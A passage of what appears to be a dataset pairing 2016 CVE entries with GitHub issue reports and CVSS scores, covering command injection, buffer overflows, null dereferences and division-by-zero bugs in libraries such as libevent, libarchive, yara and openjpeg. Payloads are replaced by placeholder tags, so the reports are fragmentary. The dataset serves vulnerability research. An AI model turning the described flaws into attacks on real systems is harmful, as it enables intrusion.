  1358. "Repo_new": "dejan/espeak-ruby",
  1359. "Issue_Created_At": "2016-04-13T13:43:07Z",
  1360. "description": "Improper text validation enables read ENV variables. This enables you to read env variables: speech = APITAG APITAG May be it is possible to perform RCE injection.",
  1361. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1362. "severity": "CRITICAL",
  1363. "baseScore": 9.8,
  1364. "impactScore": 5.9,
  1365. "exploitabilityScore": 3.9
  1366. },
  1367. {
  1368. "CVE_ID": "CVE-2016-10194",
  1369. "Issue_Url_old": "https://github.com/spejman/festivaltts4r/issues/1",
  1370. "Issue_Url_new": "https://github.com/spejman/festivaltts4r/issues/1",
  1371. "Repo_new": "spejman/festivaltts4r",
  1372. "Issue_Created_At": "2016-04-22T20:58:28Z",
  1373. "description": "Command Injection. The APITAG and APITAG methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods. Proof of concept: CODETAG APITAG",
  1374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1375. "severity": "CRITICAL",
  1376. "baseScore": 9.8,
  1377. "impactScore": 5.9,
  1378. "exploitabilityScore": 3.9
  1379. },
  1380. {
  1381. "CVE_ID": "CVE-2016-10195",
  1382. "Issue_Url_old": "https://github.com/libevent/libevent/issues/317",
  1383. "Issue_Url_new": "https://github.com/libevent/libevent/issues/317",
  1384. "Repo_new": "libevent/libevent",
  1385. "Issue_Created_At": "2016-01-27T14:50:12Z",
  1386. "description": "libevent dns remote stack overread vulnerability. Hello, the APITAG function in libevent's DNS code is vulnerable to a buffer overread NUMBERTAG if (cp != name_out NUMBERTAG if (cp NUMBERTAG end) return NUMBERTAG cp NUMBERTAG if (cp + label_len >= end) return NUMBERTAG memcpy(cp, packet + j, label_len NUMBERTAG cp += label_len NUMBERTAG j += label_len; No check is made against length before the memcpy occurs. This was found through the Tor bug bounty program and the discovery should be credited to APITAG Vranken'.",
  1387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1388. "severity": "CRITICAL",
  1389. "baseScore": 9.8,
  1390. "impactScore": 5.9,
  1391. "exploitabilityScore": 3.9
  1392. },
  1393. {
  1394. "CVE_ID": "CVE-2016-10196",
  1395. "Issue_Url_old": "https://github.com/libevent/libevent/issues/318",
  1396. "Issue_Url_new": "https://github.com/libevent/libevent/issues/318",
  1397. "Repo_new": "libevent/libevent",
  1398. "Issue_Created_At": "2016-01-27T14:53:17Z",
  1399. "description": "libevent (stack) buffer overflow in APITAG Hello, in APITAG NUMBERTAG char buf NUMBERTAG cp = strchr(ip_as_string NUMBERTAG if ( ip_as_string NUMBERTAG int len NUMBERTAG if (!(cp = strchr(ip_as_string NUMBERTAG return NUMBERTAG len = (int) ( cp (ip_as_string NUMBERTAG if (len > (int)sizeof(buf NUMBERTAG return NUMBERTAG memcpy(buf, ip_as_string NUMBERTAG len); Length between '[' and ']' is cast to signed NUMBERTAG bit integer on line NUMBERTAG Is the length is more than NUMBERTAG INT_MAX), len will hold a negative value. Consequently, it will pass the check at line NUMBERTAG Segfault happens at line NUMBERTAG Generate a APITAG with generate APITAG then compile and run poc.c. See FILETAG for functions in tor that might be vulnerable. Please credit APITAG Vranken' for this discovery through the Tor bug bounty program.",
  1400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1401. "severity": "HIGH",
  1402. "baseScore": 7.5,
  1403. "impactScore": 3.6,
  1404. "exploitabilityScore": 3.9
  1405. },
  1406. {
  1407. "CVE_ID": "CVE-2016-10197",
  1408. "Issue_Url_old": "https://github.com/libevent/libevent/issues/332",
  1409. "Issue_Url_new": "https://github.com/libevent/libevent/issues/332",
  1410. "Repo_new": "libevent/libevent",
  1411. "Issue_Created_At": "2016-03-03T15:00:09Z",
  1412. "description": "out of bounds read in APITAG Here follows a bug report by Guido Vranken via the APITAG bug bounty program_. Please credit Guido accordingly. Bug report The DNS code of Libevent contains this rather obvious OOB read: CODETAG If the length of APITAG is NUMBERTAG then line NUMBERTAG reads NUMBERTAG byte before the buffer. This will trigger a crash on ASAN protected builds. To reproduce: Build libevent with ASAN: APITAG Put the attached APITAG and APITAG in the source directory and then do: ERRORTAG This happens because I create a zero length string in APITAG : APITAG If you uncomment the last line, it will not crash. Guido",
  1413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1414. "severity": "HIGH",
  1415. "baseScore": 7.5,
  1416. "impactScore": 3.6,
  1417. "exploitabilityScore": 3.9
  1418. },
  1419. {
  1420. "CVE_ID": "CVE-2016-10209",
  1421. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/842",
  1422. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/842",
  1423. "Repo_new": "libarchive/libarchive",
  1424. "Issue_Created_At": "2016-12-12T17:47:50Z",
  1425. "description": "SIGSEGV in APITAG APITAG SIGSEGV in APITAG APITAG Tested on Git HEAD: APITAG Payload: URLTAG To reproduce: APITAG ASAN Output: ERRORTAG APITAG NUMBERTAG ABORTING",
  1426. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1427. "severity": "MEDIUM",
  1428. "baseScore": 5.5,
  1429. "impactScore": 3.6,
  1430. "exploitabilityScore": 1.8
  1431. },
  1432. {
  1433. "CVE_ID": "CVE-2016-10210",
  1434. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/576",
  1435. "Issue_Url_new": "https://github.com/virustotal/yara/issues/576",
  1436. "Repo_new": "virustotal/yara",
  1437. "Issue_Created_At": "2016-12-06T09:18:57Z",
  1438. "description": "Null Pointer Dereference in APITAG Null Pointer Dereference in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
  1439. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1440. "severity": "HIGH",
  1441. "baseScore": 7.5,
  1442. "impactScore": 3.6,
  1443. "exploitabilityScore": 3.9
  1444. },
  1445. {
  1446. "CVE_ID": "CVE-2016-10211",
  1447. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/575",
  1448. "Issue_Url_new": "https://github.com/virustotal/yara/issues/575",
  1449. "Repo_new": "virustotal/yara",
  1450. "Issue_Created_At": "2016-12-06T09:15:26Z",
  1451. "description": "Use After Free in APITAG Use After Free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
  1452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1453. "severity": "HIGH",
  1454. "baseScore": 7.5,
  1455. "impactScore": 3.6,
  1456. "exploitabilityScore": 3.9
  1457. },
  1458. {
  1459. "CVE_ID": "CVE-2016-10216",
  1460. "Issue_Url_old": "https://github.com/sivann/itdb/issues/56",
  1461. "Issue_Url_new": "https://github.com/sivann/itdb/issues/56",
  1462. "Repo_new": "sivann/itdb",
  1463. "Issue_Created_At": "2016-11-28T07:01:45Z",
  1464. "description": "itdb NUMBERTAG Cross Site Scripting (XSS). APITAG itdb NUMBERTAG Cross Site Scripting APITAG",
  1465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1466. "severity": "MEDIUM",
  1467. "baseScore": 6.1,
  1468. "impactScore": 2.7,
  1469. "exploitabilityScore": 2.8
  1470. },
  1471. {
  1472. "CVE_ID": "CVE-2016-10252",
  1473. "Issue_Url_old": "https://github.com/Opendigitalradio/ODR-PadEnc/issues/2",
  1474. "Issue_Url_new": "https://github.com/opendigitalradio/odr-padenc/issues/2",
  1475. "Repo_new": "opendigitalradio/odr-padenc",
  1476. "Issue_Created_At": "2017-03-07T18:13:36Z",
  1477. "description": "Memory leak. I have found out a memory leak in ODR APITAG NUMBERTAG FILETAG I have a multiplexer where I run NUMBERTAG instances of odr padenc. They are executed as the following CODETAG PATHTAG contains only one PNG image and is not updated. I have noticed that at some point I stopped having log messages from padenc but process keeps running. When I did APITAG there were some data NUMBERTAG screens on terminal).",
  1478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1479. "severity": "HIGH",
  1480. "baseScore": 7.5,
  1481. "impactScore": 3.6,
  1482. "exploitabilityScore": 3.9
  1483. },
  1484. {
  1485. "CVE_ID": "CVE-2016-10321",
  1486. "Issue_Url_old": "https://github.com/web2py/web2py/issues/1585",
  1487. "Issue_Url_new": "https://github.com/web2py/web2py/issues/1585",
  1488. "Repo_new": "web2py/web2py",
  1489. "Issue_Created_At": "2017-03-05T02:29:48Z",
  1490. "description": "CVETAG , CVETAG , CVETAG . Hello, several security vulnerabilities were reported for web2py and they already got CVEs assigned. I could not find any information about them in your git repository. Are you aware of them and are there any fixes available? URLTAG",
  1491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1492. "severity": "CRITICAL",
  1493. "baseScore": 9.8,
  1494. "impactScore": 5.9,
  1495. "exploitabilityScore": 3.9
  1496. },
  1497. {
  1498. "CVE_ID": "CVE-2016-10349",
  1499. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/834",
  1500. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/834",
  1501. "Repo_new": "libarchive/libarchive",
  1502. "Issue_Created_At": "2016-12-06T11:04:14Z",
  1503. "description": "heap buffer overflow in archive_le NUMBERTAG dec. On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it a duplicate of NUMBERTAG or a similar bug?",
  1504. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1505. "severity": "MEDIUM",
  1506. "baseScore": 5.5,
  1507. "impactScore": 3.6,
  1508. "exploitabilityScore": 1.8
  1509. },
  1510. {
  1511. "CVE_ID": "CVE-2016-10350",
  1512. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/835",
  1513. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/835",
  1514. "Repo_new": "libarchive/libarchive",
  1515. "Issue_Created_At": "2016-12-06T11:07:26Z",
  1516. "description": "heap buffer overflow in APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it a duplicate of NUMBERTAG or a similar bug?",
  1517. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1518. "severity": "MEDIUM",
  1519. "baseScore": 5.5,
  1520. "impactScore": 3.6,
  1521. "exploitabilityScore": 1.8
  1522. },
  1523. {
  1524. "CVE_ID": "CVE-2016-10351",
  1525. "Issue_Url_old": "https://github.com/telegramdesktop/tdesktop/issues/2666",
  1526. "Issue_Url_new": "https://github.com/telegramdesktop/tdesktop/issues/2666",
  1527. "Repo_new": "telegramdesktop/tdesktop",
  1528. "Issue_Created_At": "2016-11-23T14:51:44Z",
  1529. "description": "set better permission on APITAG Hello, by default the APITAG directory has NUMBERTAG APITAG I think would be great set it to NUMBERTAG or NUMBERTAG While the main homedir has NUMBERTAG and it happens by default here), a local user can obtain the contents of APITAG I did not investigate what a local user which obtain those files can eventually steal. Thanks.",
  1530. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  1531. "severity": "MEDIUM",
  1532. "baseScore": 5.5,
  1533. "impactScore": 3.6,
  1534. "exploitabilityScore": 1.8
  1535. },
  1536. {
  1537. "CVE_ID": "CVE-2016-10375",
  1538. "Issue_Url_old": "https://github.com/fbb-git/yodl/issues/1",
  1539. "Issue_Url_new": "https://github.com/fbb-git/yodl/issues/1",
  1540. "Repo_new": "fbb-git/yodl",
  1541. "Issue_Created_At": "2016-02-04T06:33:18Z",
  1542. "description": "invalid memory read in queuepush.c / function APITAG Compiling yodl with address sanitizer ( fsanitize=address) shows an invalid memory read in the function APITAG I tried to look at the source and find the bug, but I'm not familiar with the code base and was unable to easily determine the reason. This can be reproduced simply by trying to compile everything with address sanitizer enabled: CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build programs CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build macros CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build man This was tested with release NUMBERTAG The error message from address sanitizer NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG bc0 sp NUMBERTAG ffe NUMBERTAG bb0 READ of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG d NUMBERTAG in queue_push PATHTAG NUMBERTAG d in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG efd7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f0ed5aab7d7 in malloc ( PATHTAG NUMBERTAG c4b in n_malloc PATHTAG NUMBERTAG in new_memory PATHTAG NUMBERTAG e1 in queue_construct PATHTAG NUMBERTAG b in l_media_construct_memory PATHTAG NUMBERTAG a8 in l_push PATHTAG NUMBERTAG in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG SUMMARY: APITAG unknown crash PATHTAG queue_push Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9da0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9db0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd NUMBERTAG c NUMBERTAG fff9de NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING",
  1543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1544. "severity": "CRITICAL",
  1545. "baseScore": 9.8,
  1546. "impactScore": 5.9,
  1547. "exploitabilityScore": 3.9
  1548. },
  1549. {
  1550. "CVE_ID": "CVE-2016-10504",
  1551. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/835",
  1552. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/835",
  1553. "Repo_new": "uclouvain/openjpeg",
  1554. "Issue_Created_At": "2016-09-13T10:13:45Z",
  1555. "description": "Out of Bounds Write in opj_mqc_byteout of mqc.c. DESCRIPTION ============== An Out of Bounds Write issue can be occurred in function opj_mqc_byteout of mqc.c during executing opj_compress . This issue was caused by a malformed BMP file. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG",
  1556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1557. "severity": "MEDIUM",
  1558. "baseScore": 6.5,
  1559. "impactScore": 3.6,
  1560. "exploitabilityScore": 2.8
  1561. },
  1562. {
  1563. "CVE_ID": "CVE-2016-10505",
  1564. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/792",
  1565. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/792",
  1566. "Repo_new": "uclouvain/openjpeg",
  1567. "Issue_Created_At": "2016-06-28T02:15:25Z",
  1568. "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1569. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1570. "severity": "MEDIUM",
  1571. "baseScore": 6.5,
  1572. "impactScore": 3.6,
  1573. "exploitabilityScore": 2.8
  1574. },
  1575. {
  1576. "CVE_ID": "CVE-2016-10505",
  1577. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/785",
  1578. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/785",
  1579. "Repo_new": "uclouvain/openjpeg",
  1580. "Issue_Created_At": "2016-05-25T03:47:58Z",
  1581. "description": "Null Pointer Access in function color_esycc_to_rgb of color.c. Title Null Pointer Access in function color_esycc_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1583. "severity": "MEDIUM",
  1584. "baseScore": 6.5,
  1585. "impactScore": 3.6,
  1586. "exploitabilityScore": 2.8
  1587. },
  1588. {
  1589. "CVE_ID": "CVE-2016-10505",
  1590. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/784",
  1591. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/784",
  1592. "Repo_new": "uclouvain/openjpeg",
  1593. "Issue_Created_At": "2016-05-25T03:47:12Z",
  1594. "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1596. "severity": "MEDIUM",
  1597. "baseScore": 6.5,
  1598. "impactScore": 3.6,
  1599. "exploitabilityScore": 2.8
  1600. },
  1601. {
  1602. "CVE_ID": "CVE-2016-10505",
  1603. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/776",
  1604. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/776",
  1605. "Repo_new": "uclouvain/openjpeg",
  1606. "Issue_Created_At": "2016-05-06T06:09:25Z",
  1607. "description": "Null Pointer Access in function imagetopnm of convert.c. Title APITAG Null Pointer Access in function imagetopnm of convert.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1609. "severity": "MEDIUM",
  1610. "baseScore": 6.5,
  1611. "impactScore": 3.6,
  1612. "exploitabilityScore": 2.8
  1613. },
  1614. {
  1615. "CVE_ID": "CVE-2016-10506",
  1616. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/780",
  1617. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/780",
  1618. "Repo_new": "uclouvain/openjpeg",
  1619. "Issue_Created_At": "2016-05-06T06:11:42Z",
  1620. "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1622. "severity": "MEDIUM",
  1623. "baseScore": 6.5,
  1624. "impactScore": 3.6,
  1625. "exploitabilityScore": 2.8
  1626. },
  1627. {
  1628. "CVE_ID": "CVE-2016-10506",
  1629. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/779",
  1630. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/779",
  1631. "Repo_new": "uclouvain/openjpeg",
  1632. "Issue_Created_At": "2016-05-06T06:11:12Z",
  1633. "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1635. "severity": "MEDIUM",
  1636. "baseScore": 6.5,
  1637. "impactScore": 3.6,
  1638. "exploitabilityScore": 2.8
  1639. },
  1640. {
  1641. "CVE_ID": "CVE-2016-10506",
  1642. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/778",
  1643. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/778",
  1644. "Repo_new": "uclouvain/openjpeg",
  1645. "Issue_Created_At": "2016-05-06T06:10:50Z",
  1646. "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1648. "severity": "MEDIUM",
  1649. "baseScore": 6.5,
  1650. "impactScore": 3.6,
  1651. "exploitabilityScore": 2.8
  1652. },
  1653. {
  1654. "CVE_ID": "CVE-2016-10506",
  1655. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/777",
  1656. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/777",
  1657. "Repo_new": "uclouvain/openjpeg",
  1658. "Issue_Created_At": "2016-05-06T06:10:19Z",
  1659. "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1661. "severity": "MEDIUM",
  1662. "baseScore": 6.5,
  1663. "impactScore": 3.6,
  1664. "exploitabilityScore": 2.8
  1665. },
  1666. {
  1667. "CVE_ID": "CVE-2016-10506",
  1668. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/732",
  1669. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/732",
  1670. "Repo_new": "uclouvain/openjpeg",
  1671. "Issue_Created_At": "2016-03-28T08:55:53Z",
  1672. "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function in (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG if (!((pi >x % (OPJ_INT NUMBERTAG comp >dx APITAG x == pi >t NUMBERTAG tr NUMBERTAG APITAG d NUMBERTAG gdb) p rp NUMBERTAG gdb) bt NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dx is NUMBERTAG and the value of rpx is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dx APITAG x%(OPJ_INT NUMBERTAG comp >dx<<rpx) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  1673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1674. "severity": "MEDIUM",
  1675. "baseScore": 6.5,
  1676. "impactScore": 3.6,
  1677. "exploitabilityScore": 2.8
  1678. },
  1679. {
  1680. "CVE_ID": "CVE-2016-10506",
  1681. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/731",
  1682. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/731",
  1683. "Repo_new": "uclouvain/openjpeg",
  1684. "Issue_Created_At": "2016-03-28T08:54:54Z",
  1685. "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) bt NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG a NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read 